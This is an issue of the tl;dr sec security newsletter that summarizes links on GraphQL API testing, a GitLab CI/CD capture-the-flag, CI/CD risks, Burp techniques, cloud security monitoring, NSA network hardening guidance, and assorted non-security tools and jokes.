[tl;dr sec] #124 - GraphQL Cop, GitLab CI/CD CTF, NSA's Network Infrastructure Security Guidance
Tool to test GraphQL APIs, learn to exploit and pivot a target GitLab instance, PDF by NSA on hardening your network.
I hope you’ve been doing well!
Last week I shared a link to a hilarious card game about pitching ridiculous, fabricated start-ups.
An example from their home page:
What a time to be alive 🤣
📢 🎟 Code To Cloud: The Security Summit For Practitioners By Practitioners
Register for the free virtual event at the intersection of Security, DevOps, and Cloud on March 23-24! You’ll learn from 20+ of the leading DevSecOps experts in 24 hours of keynotes, panels, breakout sessions, lightning talks, and hands-on labs. The Code to Cloud Summit will feature security insights across cloud-native tech stacks—from IaC and open-source packages to containers and workloads.
Speakers include Srinath Kuruvadi (Netflix), Nancy Gariché (GitHub Security Lab and OWASP DevSlop), Madhu Akula (Miro and KubernetesGoat), Shannon Lietz (Adobe), Ashish Rajan (PageUp and Cloud Security Podcast), and more.
📜 In this newsletter...
Conferences: LocoMocoSec CFP is open!
CI/CD: GitLab CI/CD themed CTF you can run in your AWS account, Top 10 CI/CD security risks
AppSec: Security for package managers, turning language doc recommendations into continuous code checks
Web Security: Tool to test GraphQL APIs for common security issues, how to Burp good, Burp extension to finding and exploit PKCS padding oracles
Cloud Security: Simple Lambda to monitor CloudTrail for manual Console actions, infrastructure as data, using AWS Step functions for continuous monitoring, security dashboards as code
Network Security: Debugging certificate errors, NSA's network infra security guidance
Exploitation: Exploit mitigation overview for various OS's and apps, survey of why memory safety is still a concern
Misc: Web app to remove unwanted things from images, free online editor for animated sprites and pixel art, Simple Wikipedia, find words on the tip of your tongue, iOS app to find public restrooms
Humor: A walk sign asking you to change your password, CNCF puzzle, security vendors unmasked
LocoMocoSec 2022 CFP is Open!
A great single track conference in Hawaii 🏖️ CFP closes April 3rd.
Insufficient Flow Control Mechanisms
Inadequate Identity and Access Management
Dependency Chain Abuse
Poisoned Pipeline Execution (PPE)
Insufficient PBAC (Pipeline-Based Access Controls)
Insufficient Credential Hygiene
Insecure System Configuration
Ungoverned Usage of 3rd Party Services
Improper Artifact Integrity Validation
Security for package maintainers
Guide by Seth Larson on how open source package maintainers can secure their accounts, the platforms and roles for various package repositories, securing your package repository, and more.
Scaling Semgrep rule coverage by spidering language documentation
Many languages and frameworks have extensive docs, and somewhere in them, there are periodic Warning call-out blocks that say something like, “Make sure not to do this, it’s dangerous.” But who has time to read and remember hundreds of pages of docs?
Neat post by r2c’s Kurt Boberg on writing a scraper to extract all of these Warnings from the MSDN docs, so now you can get programmatically warned about dangerous C# code using open source Semgrep rules. And there’s a bunch of other new C# rules for all major OWASP vulnerability classes.
How to Burp Good
Great walkthrough by @n00py1 of how to do useful things in Burp, like: password brute forcing, password spraying, handling CSRF tokens, re-validating sessions, targeted scanning, finding hidden pages, SSL stripping, and more.
Padding Oracle Hunter
New Burp Extension by the Singapore government that helps penetration testers quickly identify and exploit the PKCS#7 and PKCS#1 v1.5 padding oracle vulnerability. More context by Eugene Lim.
A simple Lambda that monitors your CloudTrail log files to find manual actions taken in your accounts, by Paul Zietsman. Valuable intel for when your cloud state is getting out of sync with your infrastructure as code.
A collaboration from VMWare and SaltStack that aims to simplify cloud configuration from Infrastructure as Code to Infrastructure as Data. It can scan your current cloud deployments and generate all the data needed to manage them. Idem can manage not just cloud providers, but any API driven system, such as GitLab.com.
Why Step Functions is the Best AWS Service You Are Not Using
stackArmor’s Matthew Venne describes the power of using AWS Step Functions to implement continuous security monitoring, such as tracking SSL configuration status to meet FedRAMP requirements.
Recent changes make this much easier:
You can now call AWS API calls directly from State Machines instead of stitching together simple Lambdas for every action.
Workflow Studio is a slick browser-based wizard where you can drag and drop to to define your flow.
Dashboards as Code with HCL + SQL
Steampipe now supports defining various Dashboards as Code, giving you real-time insight into your cloud environment, compliance posture, and more. They’ve released 79 AWS Insights dashboards that include security reports and visualizations of VPC & IAM entity relationships.
Debugging Certificate Errors
Great walkthrough by Jan Schaumann on various debugging techniques to better make sense of errors: cert expired, wrong name on the cert, incomplete cert chain, unknown root, and more.
Network architecture and design
Authentication, authorization, and accounting
Logging and monitoring
By NCC Group: A knowledge base of exploit mitigations available across numerous operating systems (Windows, Linux, Android, iOS, and more), architectures and applications (Firefox, Edge, Chrome, Office) and versions.
📢 Trail of Bits’ ZK Docs: comprehensive and interactive documentation on implementation of zero-knowledge proof systems
Trail of Bits released ZKDocs: free and open source documentation for non-standardized cryptographic primitives. ZKDocs provides comprehensive implementation details and security considerations for developers using zero-knowledge proofs and other non-standard primitives. We hope this extensive collection of information will help devs avoid introducing bugs.
Whoa, ☝️ is pretty cool.
Magic Eraser - Remove unwanted things from images in seconds
Upload an image, mark the bit you need removed, download the fixed up image.
A free online editor for animated sprites & pixel art. Create animations in your browser.
Wikipedia, but using basic English words and shorter sentences, making it easier to read for children and people learning English.
Tip of My Tongue
Find that word that you’ve been thinking about all day but just can’t seem to remember. Search and filter by partial word, letters, word meaning, length.
Flush - Toilet Finder & Map
iOS app to help you find public restrooms.
A walk sign continually repeating “CHANGE PASSWORD”
Nothing to see here, everything is fine.
✉️ Wrapping Up
Have questions, comments, or feedback? Just reply directly, I'd love to hear from you.
If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏
Thanks for reading!